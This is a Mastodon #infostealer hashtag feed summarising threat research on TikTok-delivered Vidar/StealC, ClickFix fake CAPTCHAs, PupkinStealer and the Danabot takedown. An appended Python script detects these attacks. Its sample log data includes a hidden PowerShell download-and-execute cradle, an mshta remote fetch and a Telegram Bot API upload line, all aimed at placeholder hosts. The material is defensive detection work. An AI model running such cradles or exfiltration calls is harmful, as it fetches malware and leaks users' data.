techhub.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
#infostealer


Talk to your TikTok kids!
Trend Research has uncovered a new social-engineering campaign that uses TikTok to spread the infostealers Vidar and StealC. In this attack, videos (possibly AI-generated) are used to instruct users to run PowerShell commands disguised as software activation steps.
trendmicro.com/de_de/research/
#infosec #datenschutz #datensicherheit #cybercrime #infostealer #tiktok #fedilz

Trend Micro: TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers Instead. Trend™ Research uncovered a campaign on TikTok that uses videos to lure victims into downloading information stealers, a tactic that can be automated using AI tools.

Caught in the CAPTCHA: How ClickFix is Weaponizing Verification Fatigue to Deliver RATs & Infostealers

Threat actors are exploiting user fatigue with anti-spam mechanisms through a technique called ClickFix. This method involves compromising websites and embedding fraudulent CAPTCHA images, which, when solved by unsuspecting users, lead to the execution of malicious code. The attack chain typically includes PowerShell commands and the use of legitimate Windows tools to download and execute additional payloads. Common malware delivered through this technique includes Lumma Stealer, NetSupport RAT, and SectopRAT. The success of ClickFix relies heavily on social engineering and user interaction, making user education and awareness crucial in mitigating these attacks. Recommendations include training users to recognize suspicious requests, restricting PowerShell execution, and deploying advanced EDR solutions.

Pulse ID: 682f9d00cee548c073778038
Pulse Link: otx.alienvault.com/pulse/682f9
Pulse Author: AlienVault
Created: 2025-05-22 21:54:08

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue - Open Threat Exchange: Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

The #FBI and #DCIS disrupted #Danabot. #ESET was one of several companies that cooperated in this effort. welivesecurity.com/en/eset-res
#ESETresearch has been involved in this operation since 2018. Our contribution included providing technical analyses of the malware and its backend infrastructure, as well as identifying Danabot’s C&C servers. Danabot is a #MaaS #infostealer that has also been seen pushing additional malware – even #ransomware, such as #LockBit, #Buran, and #Crisis – to compromised systems.
We have analyzed Danabot campaigns all around the world and found a substantial number of distinct samples of the malware, as well as identified more than 1,000 C&Cs.
This infostealer is frequently promoted on underground forums. The affiliates are offered an administration panel application, a backconnect tool for real-time control of bots, and a proxy server application that relays the communication between the bots and the C&C server.
IoCs are available in our GitHub repo. You can expect updates with more details in the coming days. github.com/eset/malware-ioc/tr

PupkinStealer .NET Infostealer Using Telegram for Data Theft

PupkinStealer is a newly identified .NET-based information-stealing malware that extracts sensitive data like web browser passwords and app session tokens, exfiltrating it via Telegram. It targets Chromium-based browsers, Telegram, and Discord, focusing on credential theft and session hijacking. The malware performs minimal system discovery, collects files from the desktop, and captures a screenshot. It packages stolen data into a ZIP archive and sends it to the attacker through Telegram's Bot API. PupkinStealer doesn't employ persistence mechanisms, relying on quick execution and low-profile behavior. Its primary evasion technique is leveraging legitimate Telegram infrastructure for communication.

Pulse ID: 682f21f740ee536b48e48783
Pulse Link: otx.alienvault.com/pulse/682f2
Pulse Author: AlienVault
Created: 2025-05-22 13:09:11

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue - Open Threat Exchange: Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
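As an added example (not from any of the posts above, and not code from LevelBlue, Trend Micro or ESET), the script below triages constructed log lines for the two behaviours the ClickFix and PupkinStealer posts describe: PowerShell or a Windows-native download tool started from the user's shell with a hidden window or a download cradle, and an upload to the Telegram Bot API (api.telegram.org/bot<token>/sendDocument) from a process that is not expected to use it. The process-event and proxy-line layouts, process names, hostnames and the bot token are all constructed for the example; the LOLBin list and the Telegram allowlist are assumptions to adapt to your environment.

```python
import re

# Parent processes from which a user-typed command (Run dialog, shortcut)
# starts; ClickFix relies on the victim launching PowerShell from here.
USER_SHELL_PARENTS = {"explorer.exe"}
# Windows-native tools that ClickFix chains use to fetch the next stage
# (assumption: a representative list, not exhaustive).
LOLBINS = {"mshta.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
# Command-line fragments typical of a download-and-execute cradle.
CRADLE_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b|https?://")
HIDDEN_MARKERS = ("-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand")

# Telegram Bot API call: group 1 is the bot id, group 2 the secret token
# (never copied into findings), group 3 the API method.
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(\d+):([\w-]+)/(\w+)", re.I)
# Processes accepted as legitimate Telegram API clients (assumption).
TELEGRAM_ALLOWLIST = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
EXFIL_METHODS = {"senddocument", "sendmessage"}

# Constructed process-creation records (simplified Sysmon-style fields).
PROCESS_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify.txt)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/captcha.hta"},
    {"parent": r"C:\Program Files\Vendor\buildtool.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\build\deploy.ps1"},
]

# Constructed web-proxy lines: timestamp, method, URL, then key=value fields.
PROXY_LINES = [
    "2025-05-22T13:10:02Z POST https://api.telegram.org/bot123456789:AAExampleTokenNotReal/sendDocument proc=svchst.exe bytes=184320",
    "2025-05-22T13:11:40Z POST https://api.telegram.org/bot123456789:AAExampleTokenNotReal/sendMessage proc=telegram.exe bytes=512",
    "2025-05-22T13:12:07Z GET https://www.example.invalid/ proc=chrome.exe bytes=2048",
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process_event(ev):
    """Return the indicators matched by one process-creation event."""
    reasons = []
    parent, image = _basename(ev["parent"]), _basename(ev["image"])
    cmd = ev["cmdline"].lower()
    if parent in USER_SHELL_PARENTS and image in {"powershell.exe", "pwsh.exe"}:
        reasons.append("powershell started from the user's shell")
    if parent in USER_SHELL_PARENTS and image in LOLBINS:
        reasons.append(f"{image} started from the user's shell")
    if any(m in cmd for m in HIDDEN_MARKERS):
        reasons.append("hidden window or encoded command")
    if CRADLE_RE.search(cmd):
        reasons.append("download-and-execute cradle")
    return reasons


def find_clickfix_launches(events):
    """Flag events that pair a user-shell launch with at least one more indicator."""
    hits = []
    for ev in events:
        reasons = score_process_event(ev)
        if len(reasons) >= 2 and any(r.endswith("shell") for r in reasons):
            hits.append({"image": _basename(ev["image"]), "reasons": reasons})
    return hits


def find_telegram_exfil(lines):
    """Flag Telegram Bot API uploads from processes not expected to use it."""
    findings = []
    for line in lines:
        m = TELEGRAM_BOT_RE.search(line)
        if not m:
            continue
        bot_id, _token, method = m.groups()  # token deliberately discarded
        fields = dict(kv.split("=", 1) for kv in line.split() if "=" in kv)
        proc = fields.get("proc", "").lower()
        if method.lower() in EXFIL_METHODS and proc not in TELEGRAM_ALLOWLIST:
            findings.append({"bot_id": bot_id, "method": method,
                             "proc": proc, "bytes": int(fields.get("bytes", "0"))})
    return findings


if __name__ == "__main__":
    for hit in find_clickfix_launches(PROCESS_EVENTS):
        print("ClickFix-style launch:", hit)
    for finding in find_telegram_exfil(PROXY_LINES):
        print("Telegram Bot API upload:", finding)
```

The ClickFix rule deliberately requires two indicators, so an administrator running a signed script from a build tool (the third constructed event) is not flagged, while a hidden PowerShell cradle or an mshta fetch typed into the Run dialog is. The Telegram rule keys on the bot id and the upload method only; the token in the URL is a credential for the attacker's bot and is dropped before anything is written to a finding.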